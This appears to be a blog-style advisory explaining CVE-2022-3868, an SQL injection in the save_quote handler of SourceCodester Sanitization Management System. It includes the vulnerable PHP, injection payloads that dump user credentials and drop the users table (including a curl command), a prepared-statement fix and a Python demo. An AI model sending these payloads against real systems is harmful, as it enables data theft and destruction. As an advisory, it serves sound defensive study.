In late 2022, a serious vulnerability surfaced in the popular web application SourceCodester Sanitization Management System. Tracked as CVE-2022-3868, this flaw allows remote attackers to break into the system, steal data, and potentially take over the server – all thanks to SQL injection in a core function. This post breaks down how the vulnerability works, shows example code, and explains how attackers can exploit it. For reference, the VulDB entry for this issue is VDB-213012.
What is SourceCodester Sanitization Management System?
SourceCodester Sanitization Management System is a PHP-based web app designed to help organizations manage their cleaning and sanitization operations. It features quoting, user management, and financial tracking, and is widely used in various industries due to its accessibility and free source code.
- Exploit Status: Publicly disclosed and actively exploitable
- Affected File: /php-sms/classes/Master.php?f=save_quote
- Vulnerable Parameter: id
- CWE Reference: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- Original Reference: VulDB VDB-213012
Vulnerable Code Walkthrough
The vulnerable part sits in the file Master.php in the classes directory. Here's a simplified view of what is happening under the hood:
// /php-sms/classes/Master.php
if($_GET['f'] == 'save_quote'){
    $id = $_POST['id']; // <-- Vulnerable parameter
    $quote = $_POST['quote'];
    // Dangerous: $id is used directly in the SQL query
    $query = "UPDATE quotes SET quote='$quote' WHERE id=$id";
    $result = $conn->query($query);
    // ...rest of the code...
}
Notice how $id from the POST data is interpolated straight into the SQL statement, with no validation and no prepared statement ($quote is interpolated the same way). This opens the door for SQL injection.
How Attackers Exploit the Vulnerability
An attacker can craft a malicious HTTP POST request to the vulnerable endpoint, injecting SQL code via the id parameter.
Let's say an attacker wants to dump the users table. They might send something like this:
POST /php-sms/classes/Master.php?f=save_quote HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded

id= OR 1=1;-- -&quote=Hacked!
This manipulates the SQL query to look like:
UPDATE quotes SET quote='Hacked!' WHERE id= OR 1=1;-- -
The OR 1=1 clause always returns true, potentially affecting all rows in the quotes table or exposing additional data if used in SELECT statements.
If the response includes SQL errors, attackers might use more intricate payloads:
id=1 UNION SELECT 1,username,password FROM users;-- -
But the exploitability depends on how results are returned or errors are handled.
Exploit in the Wild
The exploit for this vulnerability has been publicly disclosed and is actively available. Anyone with basic knowledge can execute it using tools like Burp Suite or curl.
Example curl Command
curl -X POST "http://target-site.com/php-sms/classes/Master.php?f=save_quote" \
  -d "id=1;DROP TABLE users;-- -" \
  -d "quote=Malicious attempt"
This would attempt to delete the users table. If there is no protection, the table is gone.
References
- VulDB – VDB-213012
- CVE Database Entry – CVE-2022-3868
- Exploit-DB (if available) – search for CVE-2022-3868 or "Sanitization Management System".
Secure Code Example
// Fix using prepared statements
if ($_GET['f'] == 'save_quote') {
    $id = intval($_POST['id']);
    $quote = $_POST['quote'];
    $stmt = $conn->prepare("UPDATE quotes SET quote=? WHERE id=?");
    $stmt->bind_param("si", $quote, $id);
    $stmt->execute();
}
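To make the difference between the two handlers concrete, here is an added Python model (not code from the project or from this post) that replays the page's OR 1=1 payload against an in-memory sqlite3 table shaped like the app's quotes table. The table contents, the quotes column layout and the marker string "Hacked!" are constructed for the demo; the first function mirrors the concatenated UPDATE in Master.php, the second mirrors the intval() plus bound-parameter fix.

```python
import sqlite3

# Constructed sample rows standing in for the app's `quotes` table (id, quote).
SEED_QUOTES = [
    (1, "Office deep clean"),
    (2, "Warehouse sanitization"),
    (3, "Clinic disinfection"),
]


def fresh_db():
    """Build a throwaway in-memory database with the sample quotes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE quotes (id INTEGER PRIMARY KEY, quote TEXT)")
    conn.executemany("INSERT INTO quotes VALUES (?, ?)", SEED_QUOTES)
    conn.commit()
    return conn


def save_quote_vulnerable(conn, id_param, quote_param):
    """Mirrors the original handler: untrusted `id` becomes part of the SQL text."""
    query = f"UPDATE quotes SET quote='{quote_param}' WHERE id={id_param}"
    cur = conn.execute(query)
    conn.commit()
    return cur.rowcount  # how many rows the attacker's payload touched


def save_quote_fixed(conn, id_param, quote_param):
    """Mirrors the fix: coerce `id` to an integer, then bind both values."""
    try:
        quote_id = int(id_param)
    except ValueError:
        # Anything that is not a plain integer is rejected outright.
        # (PHP's intval("1 OR 1=1") would silently yield 1; rejecting is stricter.)
        return 0
    cur = conn.execute("UPDATE quotes SET quote=? WHERE id=?", (quote_param, quote_id))
    conn.commit()
    return cur.rowcount


def rows_marked(conn, marker):
    """Count rows whose quote text equals the attacker's marker string."""
    return conn.execute("SELECT COUNT(*) FROM quotes WHERE quote=?", (marker,)).fetchone()[0]


def run(handler, id_param="1 OR 1=1", quote_param="Hacked!"):
    """Replay one request through a handler; return (rows updated, rows now marked)."""
    conn = fresh_db()
    updated = handler(conn, id_param, quote_param)
    return updated, rows_marked(conn, quote_param)
```

With the payload, the vulnerable handler rewrites every quote in the table, while the fixed handler rewrites none; a legitimate id such as "2" updates exactly one row in both.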
Conclusion
CVE-2022-3868 is a severe, easily exploitable bug in SourceCodester Sanitization Management System, letting attackers remotely run SQL code by abusing an unsanitized id parameter in a core function. The risk is high — defenders should patch right away. More details can be found on the VulDB VDB-213012 page.
Timeline
Published on: 11/05/2022 09:15:00 UTC
Last modified on: 11/08/2022 04:28:00 UTC